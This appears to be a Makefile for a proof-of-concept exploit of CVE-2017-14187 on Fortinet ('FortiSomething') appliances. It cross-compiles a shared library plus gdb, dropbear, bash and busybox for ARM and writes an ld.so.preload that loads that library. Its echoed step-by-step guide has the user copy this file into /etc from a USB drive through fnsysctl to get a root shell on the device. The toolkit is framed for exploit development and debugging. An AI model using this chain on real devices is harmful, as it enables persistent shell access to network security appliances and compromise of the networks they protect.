_PATH=PATH=$(PATH):$(PWD)/armv7l-linux-musleabihf-cross/bin _LDFLAGS=LDFLAGS="-static -s -Os" GDB_VER=10.1# I recommend to do not change the version. Latest version will cause horrible deps problem which I couldn't address. I gave up. BASH_VER=5.2.37 BINUTILS_VER=2.45 FILE_VER=5.46 ld.so.preload: build/shell.so echo /usb/shell.so > build/ld.so.preload @echo @echo ------------------------------------------------------------------------------------------------------------------------ @echo CVE-2017-14187 PoC for local debugging \& exploit development @echo by 0xSIGILL @echo @echo ALL DONE! @echo @echo INSTALLATION GUIDE @echo 1. Prepare a USB drive. The USB drive must have a MBR partition and FAT32 or FAT16 fs. @echo 2. Copy the contents of build directory to your USB drive. @echo 3. Insert it to your vulnerable FortiSomething. @echo 4. Open the console via admin webui. @echo 5. Get system_admin access. If you don\'t know what it is, see the official fortinet document \"config system admin\" @echo 6. Type \"fnsysctl cp /usb/ld.so.preload /etc\" and then enter your super_admin account creds. @echo 7. Type \"fnsysctl ls\" or command whatever you want. @echo It will install some symlinks for Busybox shell. Try one more. Then you will get a shell. @echo 8. Enjoy\)\) @echo ------------------------------------------------------------------------------------------------------------------------ build/shell.so: shell.c build/bin/gdb build/bin/dropbear build/busybox-armv7l build/bin/bash build/bin/neofetch build/bin/readelf build/bin/file $(_PATH) $(_LDFLAGS) armv7l-linux-musleabihf-gcc -fPIC -shared -static -s shell.c -o build/shell.so build/bin/dropbear: dir armv7l-linux-musleabihf-cross dropbear cd dropbear && $(_PATH) $(_LDFLAGS) ./configure --host=armv7l-linux-musleabihf --disable-zlib --disable-utmp --disable-wtmp && $(_PATH) $(_LDFLAGS) make -j$(nproc) && cd .. cp dropbear/dbclient dropbear/dropbear dropbear/dropbearconvert dropbear/dropbearkey -t build/bin build/bin/gdb: dir armv7l-linux-musleabihf-cross gdb-$(GDB_VER) cd gdb-$(GDB_VER) && $(_PATH) $(_LDFLAGS) ./configure --host=armv7l-linux-musleabihf --disable-source-highlight --disable-sim && $(_PATH) make -j$(nproc) && cd .. cp gdb-$(GDB_VER)/gdbserver/gdbserver gdb-$(GDB_VER)/gdb/gdb gdb-$(GDB_VER)/gdb/gcore -t build/bin sed -i '1s|.*|#!/usb/bin/bash|' build/bin/gcore build/bin/bash: dir armv7l-linux-musleabihf-cross bash-$(BASH_VER) cd bash-$(BASH_VER) && CC_FOR_BUILD="gcc -std=gnu99" $(_PATH) $(_LDFLAGS) CFLAGS="-Wno-error=implicit-function-declaration" ./configure --host=armv7l-linux-musleabihf --without-bash-malloc && $(_PATH) $(_LDFLAGS) make -j$(nproc) && cd .. cp bash-$(BASH_VER)/bash build/bin/bash build/bin/readelf:dir armv7l-linux-musleabihf-cross binutils-$(BINUTILS_VER) cd binutils-$(BINUTILS_VER) && $(_PATH) LDFLAGS="--static -static -s -Os" ./configure --host=armv7l-linux-musleabihf --disable-shared --enable-static && $(_PATH) make -j$(nproc) && cd .. cp binutils-$(BINUTILS_VER)/binutils/addr2line binutils-$(BINUTILS_VER)/binutils/ar binutils-$(BINUTILS_VER)/binutils/cxxfilt binutils-$(BINUTILS_VER)/binutils/elfedit binutils-$(BINUTILS_VER)/binutils/objcopy binutils-$(BINUTILS_VER)/binutils/objdump binutils-$(BINUTILS_VER)/binutils/ranlib binutils-$(BINUTILS_VER)/binutils/readelf binutils-$(BINUTILS_VER)/binutils/size -t build/bin build/bin/file: dir armv7l-linux-musleabihf-cross file-$(FILE_VER) cd file-$(FILE_VER) && $(_PATH) LDFLAGS="--static -static -s -Os" ./configure --host=armv7l-linux-musleabihf --disable-shared --enable-static && $(_PATH) make -j$(nproc) && cd .. cp file-$(FILE_VER)/src/file file-$(FILE_VER)/magic/magic.mgc -t build/bin build/busybox-armv7l: wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv7l -O build/busybox-armv7l build/bin/neofetch: wget https://raw.githubusercontent.com/dylanaraps/neofetch/refs/heads/master/neofetch -O build/bin/neofetch sed -i '1s|.*|#!/usb/bin/bash|' build/bin/neofetch armv7l-linux-musleabihf-cross: wget https://musl.cc/armv7l-linux-musleabihf-cross.tgz tar -xvf armv7l-linux-musleabihf-cross.tgz gdb-$(GDB_VER): wget https://ftp.gnu.org/gnu/gdb/gdb-$(GDB_VER).tar.xz tar -xvf gdb-$(GDB_VER).tar.xz dropbear: git clone https://github.com/mkj/dropbear.git -b DROPBEAR_2025.88 binutils-$(BINUTILS_VER): wget https://ftp.gnu.org/gnu/binutils/binutils-$(BINUTILS_VER).tar.xz tar -xvf binutils-$(BINUTILS_VER).tar.xz bash-$(BASH_VER): wget https://ftp.gnu.org/gnu/bash/bash-$(BASH_VER).tar.gz tar -xvf bash-$(BASH_VER).tar.gz file-$(FILE_VER): wget https://astron.com/pub/file/file-$(FILE_VER).tar.gz tar -xvf file-$(FILE_VER).tar.gz dir: mkdir -p build/bin mkdir -p build/home clean: rm -rf gdb-$(GDB_VER)* dropbear armv7l-linux-musleabihf-cross* *.o build bash*